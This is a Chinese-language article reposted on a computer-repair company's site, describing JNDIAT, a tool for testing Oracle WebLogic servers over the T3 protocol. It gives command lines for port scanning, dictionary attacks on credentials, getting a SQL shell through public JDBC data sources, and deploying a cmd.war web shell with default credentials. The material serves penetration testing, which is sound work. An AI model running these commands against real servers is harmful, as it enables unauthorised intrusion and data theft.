Jndiat：通过T3协议测试Weblogic服务器安全性 - 锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务

锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务,锦州广厦维修电脑,公司IT外包服务

		设为首页
		收藏本站

首页

公司介绍

服务项目

服务报价

维修流程

IT外包服务

服务器维护

技术文章

常见故障

锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务 → 技术文章

Jndiat：通过T3协议测试Weblogic服务器安全性

作者: 佚名日期:2018-11-13 18:23:24 来源: 本站整理

JNDIAT（JNDI攻击工具）是一款开源的通过T3协议测试Weblogic server安全性的工具。
JNDIAT使用示例：
搜索是否有可通过T3协议访问的Weblogic端口；
远程搜索有效帐户以获取特权连接；
列出可访问的JNDI（Java命名和目录接口），以了解你在远程Weblogic server上可以做执行的操作（无需/使用WebLogic帐户）；
使用不受保护的（即“public”）JDBC数据源，来获取远程交互式SQL shell；
在Weblogic server上部署应用（例如War）以获取Web shell（需要帐户）。
*已在Oracle Weblogic 11上进行测试。
特性
同时支持T3和T3（T3 over SSL）连接。JNDIAT会创建一个本地临时Java KeyStore来验证Weblogic server的证书；
支持使用空凭证进行身份验证，即login=” and password=”。默认情况下，在Weblogic中公共JDBC数据源可以与空帐户一起使用（已在version11上测试）;
如果weblogic在域中，则支持targets；
检测可通过T3协议访问的端口；
通过字典攻击查找有效凭据；
获取可通过特定帐户（或无帐户）访问的JNDI列表；
通过JDBC数据源获取远程sql shell；
使用特权帐户，你可以在weblogic服务器上部署应用程序获取Web shell。
使用示例
下载安装最新版本的jndiat：https://github.com/quentinhardy/jndiat/releases
查看帮助
java -jar Jndiat.jar -h
JNDIAT 版本
java -jar Jndiat.jar --version
端口扫描
该模块用于扫描可通过T3（或T3）协议访问的端口，获取JNDI列表。
使用7001端口建立一个T3连接：
java -jar Jndiat.jar scan -s 192.168.56.101 --ports 7001
扫描7001和7002端口：
java -jar Jndiat.jar scan -s 192.168.56.101 --ports '7001,7002'
扫描7001到7010之间的端口：
java -jar Jndiat.jar scan -s 192.168.56.101 --ports '7001-7010'
JNDIs列表
该模块用于获取通过T3协议可访问的JNDI列表。此模块非常有用，可以让你知道某些JNDI是否可以在不进行身份验证的情况下访问（例如：“public”JDBC数据源）。
获取192.168.56.101服务器7001端口可访问的JNDIs：
java -jar Jndiat.jar list -s 192.168.56.101 -p 7001
如果未在命令中指定凭据，则JNDIAT将为我们返回无需身份验证即可访问的JNDI。如果你知道有效凭据，则可以使用它来获取更多的JNDI：
java -jar Jndiat.jar list -s 192.168.56.101 -p 7001 -U username -P password
JDBC数据源
此模块允许你通过JDBC数据源获取远程SQL shell。
从JNDI数据源获取交互式SQL shell：
java -jar Jndiat.jar datasource -s 192.168.56.101 -p 7001 --sql-shell
JNDIAT将会询问你所使用的JDBC数据源。如果你知道数据源名称，则可以进行指定：
java -jar Jndiat.jar datasource -s 192.168.56.101 -p 7001 --sql-shell --datasource='jdbc/myDataSource'
部署应用
该模块允许你通过T3协议在远程Weblogic server中部署应用程序（例如.war，.ear）。要使用此模块，你可能需要有高权限（一个帐户那是必须的）。
以下命令将在远程Weblogic server上部署“cmd.war”应用：
java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 --deploy --appl-file cmd.war
从远程weblogic server取消部署先前的war（’cmd.war’）应用：
java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 --undeploy
使用–display-name选项更改weblogic server上部署的应用程序名称：
java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 --deploy --appl-file 'cmd.war' --display-name 'appli-name-displayed'
取消部署名为appli-name-display的特定应用程序：
java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 --undeploy --display-name 'appli-name-displayed'